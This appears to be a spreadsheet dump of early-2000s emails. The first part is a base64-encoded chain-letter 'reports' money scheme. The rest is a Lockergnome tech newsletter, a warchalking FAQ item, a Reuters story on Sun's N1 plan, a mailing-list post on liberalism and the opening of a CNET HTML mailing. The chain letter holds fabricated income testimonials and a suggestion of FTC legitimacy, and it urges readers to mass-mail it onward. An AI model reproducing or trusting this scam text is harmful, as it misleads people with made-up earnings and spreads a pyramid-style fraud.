 aWwgYSBjb3B5IG9mIHRoaXMgZXhjaXRpbmcgcmVwb3J0IGFmdGVyIHlvdSBo
 YXZlIHB1dCB5b3VyIG5hbWUgYW5kDQphZGRyZXNzIGluIFJlcG9ydCAjMSBh
 bmQgbW92ZWQgb3RoZXJzIHRvICMyIC4uLi4uLi4uLi4uIyA1IGFzIGluc3Ry
 dWN0ZWQgYWJvdmUuIE9uZSBvZiB0aGUNCnxwZW9wbGUgeW91IHNlbmQgdGhp
 cyB0byBtYXkgc2VuZCBvdXQgMTAwLDAwMCBvciBtb3JlIGUtbWFpbHMgYW5k
 IHlvdXIgbmFtZSB3aWxsIGJlDQpvbiBldmVyeSBvbmUgb2YgdGhlbS4NCiAN
 ClJlbWVtYmVyIHRob3VnaCwgdGhlIG1vcmUgeW91IHNlbmQgb3V0IHRoZSBt
 b3JlIHBvdGVudGlhbCBjdXN0b21lciB5b3Ugd2lsbCByZWFjaC4NClNvIG15
 IGZyaWVuZCwgSSBoYXZlIGdpdmVuIHlvdSB0aGUgaWRlYXMsIGluZm9ybWF0
 aW9uLCBtYXRlcmlhbHMgYW5kIG9wcG9ydHVuaXR5IHRvIGJlY29tZQ0KZmlu
 YW5jaWFsbHkgaW5kZXBlbmRlbnQuIElUIElTIFVQIFRPIFlPVSBOT1cgIQ0K
 PT09PT09PT0gTU9SRSBURVNUSU1PTklBTFMgPT09PT09PT09PT09DQoiTXkg
 bmFtZSBpcyBNaXRjaGVsbC4gTXkgd2lmZSwgSm9keSBhbmQgSSBsaXZlIGlu
 IENoaWNhZ28uIEkgYW0gYW4gYWNjb3VudGFudCB3aXRoIGEgbWFqb3INClUu
 Uy4gQ29ycG9yYXRpb24gYW5kIEkgbWFrZSBwcmV0dHkgZ29vZCBtb25leS4g
 V2hlbiBJIHJlY2VpdmVkIHRoaXMgcHJvZ3JhbSBJIGdydW1ibGVkDQp0byBK
 b2R5IGFib3V0IHJlY2VpdmluZyAnJ2p1bmsgbWFpbCcnLiBJIG1hZGUgZnVu
 IG9mIHRoZSB3aG9sZSB0aGluZywgc3BvdXRpbmcgbXkga25vd2xlZGdlDQpv
 ZiB0aGUgcG9wdWxhdGlvbiBhbmQgcGVyY2VudGFnZXMgaW52b2x2ZWQuIEkg
 JydrbmV3JycgaXQgd291bGRuJ3Qgd29yay4gSm9keSB0b3RhbGx5IGlnbm9y
 ZWQNCm15IHN1cHBvc2VkIGludGVsbGlnZW5jZSBhbmQgZmV3IGRheXMgbGF0
 ZXIgc2hlIGp1bXBlZCBpbiB3aXRoIGJvdGggZmVldC4gSSBtYWRlIG1lcmNp
 bGVzcw0KZnVuIG9mIGhlciwgYW5kIHdhcyByZWFkeSB0byBsYXkgdGhlIG9s
 ZCAnJ0kgdG9sZCB5b3Ugc28nJyBvbiBoZXIgd2hlbiB0aGUgdGhpbmcgZGlk
 bid0IHdvcmsuDQpXZWxsLCB0aGUgbGF1Z2ggd2FzIG9uIG1lISBXaXRoaW4g
 MyB3ZWVrcyBzaGUgaGFkIHJlY2VpdmVkIDUwIHJlc3BvbnNlcy4gV2l0aGlu
 IHRoZQ0KbmV4dCA0NSBkYXlzIHNoZSBoYWQgcmVjZWl2ZWQgdG90YWwgJCAx
 NDcsMjAwLjAwIC4uLi4uLi4uLi4uIGFsbCBjYXNoISBJIHdhcyBzaG9ja2Vk
 LiBJIGhhdmUNCmpvaW5lZCBKb2R5IGluIGhlciAnJ2hvYmJ5JycuIE1pdGNo
 ZWxsIFdvbGYgQy5QLkEuLCBDaGljYWdvLCBJbGxpbm9pcw0KPT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQonJ05vdCBiZWlu
 ZyB0aGUgZ2FtYmxpbmcgdHlwZSwgaXQgdG9vayBtZSBzZXZlcmFsIHdlZWtz
 IHRvIG1ha2UgdXAgbXkgbWluZCB0byBwYXJ0aWNpcGF0ZQ0KaW4gdGhpcyBw
 bGFuLiBCdXQgY29uc2VydmF0aXZlIHRoYXQgSSBhbSwgSSBkZWNpZGVkIHRo
 YXQgdGhlIGluaXRpYWwgaW52ZXN0bWVudCB3YXMgc28gbGl0dGxlIHRoYXQN
 CnRoZXJlIHdhcyBqdXN0IG5vIHdheSB0aGF0IEkgd291bGRuJ3QgZ2V0IGVu
 b3VnaCBvcmRlcnMgdG8gYXQgbGVhc3QgZ2V0IG15IG1vbmV5IGJhY2snJy4N
 CicnIEkgd2FzIHN1cnByaXNlZCB3aGVuIEkgZm91bmQgbXkgbWVkaXVtIHNp
 emUgcG9zdCBvZmZpY2UgYm94IGNyYW1tZWQgd2l0aCBvcmRlcnMuDQpJIG1h
 ZGUgJDMxOSwyMTAuMDAgaW4gdGhlIGZpcnN0IDEyIHdlZWtzLiBUaGUgbmlj
 ZSB0aGluZyBhYm91dCB0aGlzIGRlYWwgaXMgdGhhdCBpdCBkb2VzIG5vdA0K
 bWF0dGVyIHdoZXJlIHBlb3BsZSBsaXZlLiBUaGVyZSBzaW1wbHkgaXNuJ3Qg
 YSBiZXR0ZXIgaW52ZXN0bWVudCB3aXRoIGEgZmFzdGVyIHJldHVybiBhbmQg
 c28NCmJpZy4iIERhbiBTb25kc3Ryb20sIEFsYmVydGEsIENhbmFkYQ0KPT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KJydJ
 IGhhZCByZWNlaXZlZCB0aGlzIHByb2dyYW0gYmVmb3JlLiBJIGRlbGV0ZWQg
 aXQsIGJ1dCBsYXRlciBJIHdvbmRlcmVkIGlmIEkgc2hvdWxkIGhhdmUgZ2l2
 ZW4NCml0IGEgdHJ5LiBPZiBjb3Vyc2UsIEkgaGFkIG5vIGlkZWEgd2hvIHRv
 IGNvbnRhY3QgdG8gZ2V0IGFub3RoZXIgY29weSwgc28gSSBoYWQgdG8gd2Fp
 dCB1bnRpbCBJIHdhcw0KZS1tYWlsZWQgYWdhaW4gYnkgc29tZW9uZSBlbHNl
 Li4uLi4uLi4uMTEgbW9udGhzIHBhc3NlZCB0aGVuIGl0IGx1Y2tpbHkgY2Ft
 ZSBhZ2Fpbi4uLi4uLiBJIGRpZA0Kbm90IGRlbGV0ZSB0aGlzIG9uZSEgSSBt
 YWRlIG1vcmUgdGhhbiAkNDkwLDAwMCBvbiBteSBmaXJzdCB0cnkgYW5kIGFs
 bCB0aGUgbW9uZXkgY2FtZSB3aXRoaW4NCjIyIHdlZWtzLiIgU3VzYW4gRGUg
 U3V6YSwgTmV3IFlvcmssIE4uWS4NCj09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09DQonJ0l0IHJlYWxseSBpcyBhIGdyZWF0
 IG9wcG9ydHVuaXR5IHRvIG1ha2UgcmVsYXRpdmVseSBlYXN5IG1vbmV5IHdp
 dGggbGl0dGxlIGNvc3QgdG8geW91LiBJIGZvbGxvd2VkDQp0aGUgc2ltcGxl
 IGluc3RydWN0aW9ucyBjYXJlZnVsbHkgYW5kIHdpdGhpbiAxMCBkYXlzIHRo
 ZSBtb25leSBzdGFydGVkIHRvIGNvbWUgaW4uIE15IGZpcnN0DQptb250aCBJ
 IG1hZGUgJDIwLDU2MC4wMCBhbmQgYnkgdGhlIGVuZCBvZiB0aGlyZCBtb250
 aCBteSB0b3RhbCBjYXNoIGNvdW50IHdhcyAkMzYyLDg0MC4wMC4NCkxpZmUg
 aXMgYmVhdXRpZnVsLCBUaGFua3MgdG8gdGhlIGludGVybmV0LiIuIEZyZWQg
 RGVsbGFjYSwgV2VzdHBvcnQsIE5ldyBaZWFsYW5kDQo9PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KT1JERVIgWU9VUiBS
 RVBPUlRTIFRPREFZIEFORCBHRVQgU1RBUlRFRA0KT04gWU9VUiBST0FEIFRP
 IEZJTkFOQ0lBTCBGUkVFRE9NICENCj09PT09PT09PT09PT09PT09PT09PT09
 PT09PT09PT09PT09PT09PT09PT0NCklmIHlvdSBoYXZlIGFueSBxdWVzdGlv
 bnMgb2YgdGhlIGxlZ2FsaXR5IG9mIHRoaXMgcHJvZ3JhbSwgY29udGFjdCB0
 aGUgT2ZmaWNlIG9mIEFzc29jaWF0ZQ0KRGlyZWN0b3IgZm9yIE1hcmtldGlu
 ZyBQcmFjdGljZXMsIEZlZGVyYWwgVHJhZGUgQ29tbWlzc2lvbiwgQnVyZWF1
 IG9mIENvbnN1bWVyIFByb3RlY3Rpb24sIFdhc2hpbmd0b24sIEQuQy4NCiAN
 Ck5vdGU6IE91ciBmdWxseSBhdXRvbWF0ZWQgc3lzdGVtIHdpbGwgcmVtb3Zl
 IGlmIHlvdSBzZW5kIGFuIGVtYWlsIHRvIHJtdmhqanNzczc3XzlAeWFob28u
 Y29tIHdpdGggdGhlIHdvcmQgUkVNT1ZFIGluIHRoZSBzdWJqZWN0IGxpbmUu
 DQoNCllvdSBkb24ndCBoYXZlIHRvIHJlcGx5LCB0aGlzIGlzIGEgb25lLXRp
 bWUgdGVzdCBtYWlsaW5nLg0KSSBoYXZlIGEgbmV3IHNpdGU6ICBzb21ld2hl
 cmVvbndlYi5jb20NCg0KWW91IGFyZSB3ZWxjb21lICENCg0KNTc5M1Rka1cy
 LTg4OHJkbmwyNTAxTVRjZjktNTMyUkVKZTM5NzdWQ2J6Ni0wMDB5bDQ1
 ------=_NextPart_000_00B6_53D62C4C.C4267A64--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</si>
  <si>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&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020722.html"&gt;
       http://www.lockergnome.com/issues/daily/20020722.html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&lt;/style&gt;&lt;title&gt;20020722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href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;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07.22.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Hackers and crackers respect only one thing:&lt;/b&gt; &lt;font color="blue"&gt;strong security&lt;/font&gt;.  Keep the bad guys out of your PC or network with the advanced technology that's trusted by millions:  ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends your online privacy,and sets up in minutes. &lt;a href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=26986.10000012&amp;type=3&amp;subid=0"&gt;Click here to download now&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Listen to Lockergnomie Dale Lowery and you'll save time
 immediately. It's an old tip, but it bears repeating: "I'll often
 find Web snippets I'd like to keep - but I don't want to save the
 entire page. So, I've HOT-KEYED Notepad. Easy! Get to the most
 common Notepad shortcut icon: Start | Programs | Accessories |
 Notepad. Then right-click on the menu item and select Properties.
 You'll see that this is (indeed) a shortcut; in the lower part of
 the dialog is a field to add a hotkey. I entered 'N' for Notepad,
 Windows offered CTRL and ALT as a prefix, and now I can launch
 Notepad in an instant. I highlight the text I want to keep, copy
 it, tap my shortcut, paste it, and then save the new text file
 wherever I want. Most often, I use this trick to copy paragraphs
 that describe downloads (and save them as text files in the same
 folder as the download)." Just make sure you don't pick a keyboard
 shortcut that's already in use. Otherwise, one of them is gonna
 get cranky.
 &lt;p&gt;
 And while we're taking a trip down memory lane, Lockergnomie Ian
 Rich reminds us of Jouni Vuorio's utility: The site is
 &lt;a href="http://www.jv16.org/"&gt;jv16.org&lt;/a&gt;. The program is called
 jv16 Power Tools, and this freeware is truly worthy of praise. It
 combines a full-on registry management tool with several file
 manager tools: one to hunt down temporary files in any format and
 the other to help perform advanced file searches and comparisons.
 Mainly, I wanted the program to be brought to the attention of the
 consumer public, as it moves further and further along in
 development it just keeps getting better. I've used it on windows
 Me, and now XP - without crashes or hair-raising Registry
 corruption. It backs up everything it changes and is very easy to
 use. If you're interested in something of shareware-quality with
 forum support (for absolutely nothing), get this program. Anyway,
 I love the newsletter and the work you guys and gals do at
 Lockergnome. I hope that this author gets his recognition."
 Consider this a huge nod!
 &lt;p&gt;
 I love a good resource, and Lockergnomie Elton Jonsson from the
 United Kingdom has one for us, too: "As a dedicated subscriber, I
 just had to tell about this one. Have you ever been driven mad
 trying to find out the name of the piece of music on a television
 advert? Well, at last, here in the UK, we have an answer to that
 problem and, given that many multinationals use the same
 advertising in the USA as they do here, it may help out you guys
 as well. Check out &lt;a href="http://www.commercialbreaksandbeats.co.uk/"&gt;Commercial
 Breaks and Beats&lt;/a&gt;. I have no connection with it; I'm just
 grateful that someone has had the brilliant idea of creating it.
 If you check the message board on the site, you'll see that I'm
 not alone." This &lt;a href="http://directory.google.com/Top/Arts/Television/Commercials/"&gt;Google
 Directory&lt;/a&gt; can help fill in the blanks, I'm sure. I
 almost fell out of my chair the other day when I heard "Yeh Yeh"
 (by TMBG) being played on a Chrysler advertisement. Way to go:
 John, John, Dan, Dan, and Dan! You're the dogs kids love to bite.
 &lt;p&gt;
 And what's say we round out the report with another tip?
 Lockergnomie David Brown can oblige: "The e-mail forwarding
 service is a good idea, but you can do it yourself with Outlook
 Express. Set up two accounts (one for your old account and one for
 your new one). Craft your reply in a new message and save it.
 Then, select Tools | Message Rules | Mail | New rule. Check 'Where
 the message is from specified account' in the first section.
 'Reply with message" in section two. Select the appropriate
 account and message in the final section. Name it. You can also
 have the messages flagged or moved to another folder if you want
 to know which messages came from the old account. Once the rule
 has been created, any mail from the old account will have a reply
 sent. People should learn about mail rules, anyway." True! So,
 what rule simplifies your day?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&lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Latest Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A title="shareware: web site search engine" HREF="http://www.mywebattack.com/gnomeapp.php?id=104741"&gt;Search Engine Buil 1.45&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: clean your hard drive" HREF="http://www.mywebattack.com/gnomeapp.php?id=103363"&gt;System Cleaner 4.80&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: internet privacy tools suite" HREF="http://www.mywebattack.com/gnomeapp.php?id=103079"&gt;Smasher 2.9.16&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: " HREF="http://www.mywebattack.com/gnomeapp.php?id=102665"&gt;PixPrint 3.69&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: batch image editor" HREF="http://www.mywebattack.com/gnomeapp.php?id=100549"&gt;BatchIt! Pro 3.10&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: HTML compiler" HREF="http://www.mywebattack.com/gnomeapp.php?id=101621"&gt;HyperMaker HTML 2002.11&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: create web buttons" HREF="http://www.mywebattack.com/gnomeapp.php?id=104412"&gt;Crystal Button 1.41&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: anti-spam filter" HREF="http://www.mywebattack.com/gnomeapp.php?id=105068"&gt;Spytech SpamAgent 1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: recover data from damaged disks" HREF="http://www.mywebattack.com/gnomeapp.php?id=104512"&gt;BadCopy Pro 3.20&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: popup blocker" HREF="http://www.mywebattack.com/gnomeapp.php?id=104573"&gt;STOPzilla! 1.0.8&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: " HREF="http://www.mywebattack.com/gnomeapp.php?id=103660"&gt;WAPDraw 1.31&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: Data replication tool" HREF="http://www.mywebattack.com/gnomeapp.php?id=102389"&gt;Network File Monit 2.04&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;QuicKalendar v1.0.2 [430k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="url" href="http://www.trinfinitysoftware.com/quickalendar.shtml"&gt;http://www.trinfinitysoftware.com/quickalendar.shtml&lt;/a&gt;
 &lt;p&gt;
 {Calendar utility} You say you want to get together on the 25th, but what DAY is that? I'm not good with calendar dates; truth be told, I don't even know what day of the week it is most the time. If I didn't have my PDA armed with a Calendar with me, then I wouldn't show up to anything on time, let alone on the right day. Well, that is great for when I am mobile, but what about when I am in front of my PC? The PDA is docked, but that doesn't mean I have to be without a calendar... enter QuicKalendar! "QuicKalendar gives you quick and easy access to a calendar whenever you need it. You can view the calendar on screen, or print it out to jot down notes and appointments." You need to keep in mind that the print feature is relative to how you have QuicKalendar displayed on your machine. If you are in full screen mode, then the printout will be bigger than a standard sheet of letter paper. If you try printing in normal view, then the printout will be too small to write on. My suggestion is to play with the size of QuicKalendar's screen until you get a printout that you can be proud of. Now, you'll have no reason to be late for Gnomedex!
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Diatris v1.0 [407k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="url" href="http://www.webruler.com/mtreciokas/"&gt;http://www.webruler.com/mtreciokas/&lt;/a&gt;
 &lt;p&gt;
 {Tetris-like game} I've always been fascinated with geometric shapes. To me everything has to be somewhat symmetrical... even my hair! So it was no wonder why I was addicted to playing the game Tetris for so many years. The only problem with Tetris is that, after awhile, it starts to get a little too easy. Diatris is a bundle of three different - and much more challenging - Tetris-like games. "For the first game, Y-Diatris, the objects can move vertically and diagonally. The second game, X-Diatris, the objects can move only in two diagonal directions; the vertical drop is taken out. For the last game H-Diatris the objects can only move vertically and horizontally like most block drop games." I won't kid you, these games can be pretty hard, but if you are a Tetris fan, then these set of games are for you. If you're not a Tetris fan, don't worry, there are a few other games you might like on this site, so check it out!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&lt;b&gt;How to Troubleshoot Issues with Reading CDs&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q321641"&gt;http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q321641&lt;/a&gt;
 &lt;p&gt;
 {Disc device troubleshooting} "This article describes how you can troubleshoot issues reading CD-ROM or DVD-ROM optical discs. This article also discusses how to troubleshoot common issues with CD-R and CD-RW devices. The steps in this article apply to compact disc (CD-ROM) drives, compact disc recordable (CD-R) drives, compact disc re-writable (CD-RW) drives, and digital video disc (DVD) drives." To summarize, you should try the steps on this site before calling your technical support. Some of the steps include closing unnecessary software, testing the disc in a different computer, and cleaning the disc. Make sure to clean a disc by wiping from the center of the disc outward... if you wipe the disc in a circular fashion, then you risk scratching it. The steps in this article will only serve to save you time, as you will probably be able to fix most disc problems by following the steps. If this article doesn't help you resolve your disc problem, look on the bright side... you won't have to spend so much time on the phone with technical support, because you'll already know what the problem ISN'T!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&lt;b&gt;Modem Spy v3.1.3b [230k] W9x/2k/XP $25&lt;/b&gt;&lt;br&gt;
     Unearthed by Sergei Polishchuk
 &lt;p&gt;
 &lt;a class="url" href="http://www.modemspy.com/"&gt;http://www.modemspy.com/&lt;/a&gt;
 &lt;p&gt;
 {Answering machine} "Modem spy is a handy utility for phone calls recording. Features: 1) Records phone conversations. 2) Records from microphone. 3) Plays back recorded messages via phone line. 4) Plays back recorded messages via sound card. 5) Can record ALL incoming phone calls. 6) Has built-in software automatic gain control. 7) Detects and logs Caller ID." Gnomie Brian Stevens tried this one out for us, but had a small problem testing this on any of his machines... he doesn't have any modems! Brian says, "I was able to load the program, though, and try a few of the features out. You can record an audio memo to your machine, much like an answering machine. You can also e-mail this audio memo, although I don't recommend you do that as the WAV file didn't seem to play well when I tried e-mailing it to myself (which may have been due to the microphone it was recorded with). Other than that, Modem Spy is a solid program and is a great alternative to buying a traditional answering machine... plus in most cases it is cheaper!" Keep in mind that, for Caller ID to work, you need the Caller ID service turned on by your phone service provider.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
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt; &lt;b&gt;GET HIGH-SPEED ACCESS:&lt;/b&gt; Verizon Online DSL is an affordable,  high-speed Internet connection.   &lt;a href="http://www.qksrv.net/click-471546-2202776"&gt;Click here&lt;/a&gt;  to see if Verizon Online DSL is available in your area. &lt;img src="http://www.qksrv.net/image-471546-2202776" width="1" height="1" border="0"&gt;    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;The Avocado Papers&lt;/b&gt;&lt;br&gt;
    Unearthed by Meryl Evans
 &lt;p&gt;
 &lt;a class="url" href="http://www.theavocadopapers.com/"&gt;http://www.theavocadopapers.com/&lt;/a&gt;
 &lt;p&gt;
 After surfing serious Web site upon serious Web site, you just need to find a site where you can relax and have a good time. TheAvocadoPapers.com is one of those sites that is a little bit goofy but extremely creative. It isn't that the Web site is really about anything; there is some creative writing (usually rather funny) and the occasional interview (this week "Steve Schneider Interviews Himself"). If you are a little bit nosy, and want to peek into the lives of others, you can read Ron Bork's diary or enter the Avocado Chat. Although the makers of the Web site don't even know what it is about, I think it is quite apparent... fun! Go check out the Web site for yourself and see if you can pin down its rhyme or reason. Worst-case scenario, you can always sign up for their current promotion... free linguine!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This tip is for the Windows XP users out there. "The Windows XP operating system achieves excellent performance in part by dynamic adjustments that it makes in response to how a system is utilized. In particular, many adjustments are made when the system first runs following setup and when newly installed applications are used for the first time. These adjustments greatly influence the performance of the system. Unfortunately, the dynamic nature of Windows XP can make benchmarking more of a challenge than with previous Windows versions." To properly benchmark your Windows XP system, there are a few steps you should follow. The step with which we are concerned in this particular tip is letting your PC process any "idle tasks." Idle tasks are tasks that your PC executes when it deems the system to be unused or idle. Some of these include file placement optimization, system restore, and done-once-after-setup work items. "All of these 'idle tasks' are controllable by a system API in advapi32.dll, ProcessIdleTasks. The API's sole purpose is to allow benchmarks a simple way to force any pending idle tasks to be executed immediately, without having to wait a lengthy period of time. To call ProcessIdleTasks from the command line, use this syntax: Rundll32.exe advapi32.dll,ProcessIdleTasks." Once running, it may take up to around 15 minutes to process all of the idle tasks, and your hard drive will be active through most of it. For more steps on preparing your Windows XP machine for benchmarking, head over to the Windows Platform Development page on Benchmarking for Windows XP on Microsoft's site.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href="http://www.lockergnome.com/issues/daily/20020722.html"&gt;http://www.lockergnome.com/issues/daily/20020722.html&lt;/a&gt;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I finally have proof that the vacuum attachment wants to eat Sprocket. He's been eyeing it for weeks.
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/sprocket.vacuum.WMV"&gt;Sprocket's Pipe Dream&lt;/a&gt;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Cranky Beats  --&gt;
 We interrupt this quote for an important bulletin...
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Warchalking FAQ
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481344
 Date: Not supplied
 Aaron Swartz has written up a warchalking FAQ that addresses the shibboleths 
 and paranoia about discovering, marking and using wireless connectivity. 
     Is that illegal? 
     Although I am not a lawyer, I don't think it's illegal to make chalk marks 
     on the sidewalk. I know a lot of hopscotch players who'd be worried if it 
     was... 
     Well, is it immoral? 
     Not at all! Warchalking is a helpful service to assist people in finding 
     something they need (an Internet connection).  
 Link[1] Discuss[2]
 [1] http://www.warchalking.org/story/2002/9/22/223831/236
 [2] http://www.quicktopic.com/boing/H/vsVYCTZE7hs
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sun
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, it looks like Sun are going ahead with
 their ubiquitous computing plans without Mithril. 
 Greg
 Reuters Market News
   Sun Micro Outlines Roadmap for Managing Networks 
   Friday September 20, 5:00 am ET 
   By Peter Henderson 
   SAN FRANCISCO (Reuters) - Computer maker Sun Microsystems Inc. on Thursday
   said it would create in a few years a network environment that will be as
   straightforward to handle as a single machine, a strategy it calls N1.
   It laid out a road map for a new layer of intelligent software and systems that will meld
   unwieldy networks into easy-to-use systems, a goal similar to those of most rivals
   making computers which manage networks. 
   EMC Corp. announced this week software aimed at allowing users to manage storage
   resources as a pool. Hewlett-Packard Co has a Utility Data Center, designed for
   broader management. International Business Machines Corp's project eLiza is working
   to make computers "self-healing" when systems break.
   "Applications still have to run zeroes and ones on some computing engine but the
   whole idea behind N1 is you stop thinking about that. You don't think about what box
   it is running on," Sun Vice President Steve MacKay, head of the N1 program, said in an
   interview on the sidelines of a Sun user conference. 
   Many industry executives see computer power eventually being sold like power or
   water, as a utility that can be turned on or off, in whatever volume one wants whenever
   needed. 
   For that to happen computers must be tied together seamlessly, rather than cobbling
   them together with tenuous links, as most networks do today, experts say. There are
   still major barriers, though, such as communications standards for machines from
   different vendors to interoperate closely. 
   Sun promised to deliver a "virtualization engine" that would let administrators look at
   their entire network as a pool by the end of the year. Network administrators today
   often have no automatic system to report what is in the network. 
   "It'll tell you what you have and how it is laid out," promised MacKay
   The second stage, beginning in 2003, would allow users to identify a service, such as
   online banking, and allocate resources for them with a few clicks, Sun said. 
   Finally, in 2004, Sun's software should allow networks to change uses of resources on
   the fly in response to changing needs, such as a bank assuring quicker online response
   time for priority users, the company said.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In essence, hindsight justification.  The progressives weren't in the
 middle, they were in a society at one end and they wanted a society at
 the other end.  The middle is more or less where they got stopped.
 As to an intervention that worked, I actually have some nice things to
 say about the SEC, at least in theory.  I have a few nasty things to say
 as well, but on the whole it has been a very good thing.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Tuesday, September 24, 2002 6:37 PM
 &gt; To: fork@example.com
 &gt; Subject: Liberalism in America
 &gt; 
 &gt; liberalism
 &gt; propagandized as meddling
 &gt; in truth, the middle
 &gt; 
 &gt; "American liberalism believes that in this respect it has made a major
 &gt; contribution to the grand strategy of freedom. Where both capitalists
 and
 &gt; socialists in the 1930's were trying to narrow the choice to either/or
 --
 &gt; either laissez-faire capitalism or bureaucratic socialism -- the New
 Deal
 &gt; persisted in its vigorous faith that human intelligence and social
 &gt; experiment could work out a stable foundation for freedom in a context
 of
 &gt; security and for security in a context of freedom. That faith remains
 the
 &gt; best hope of free society today."
 &gt; 
 &gt; fluid yet crunchy,
 &gt; gg
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt;  http://www.english.upenn.edu/~afilreis/50s/schleslib.html
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;CNET Announcement&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;!-- header --&gt;
 &lt;table width="624" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/ann/hd.gif" alt="CNET Announce" width="442" height="60"&gt;&lt;/td&gt;
 &lt;td&gt;&lt;img src="http://www.cnet.com/i/nl/ann/rt.gif" width="184" height="60"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#000000" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="624" bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /header --&gt;
 &lt;!-- content --&gt;
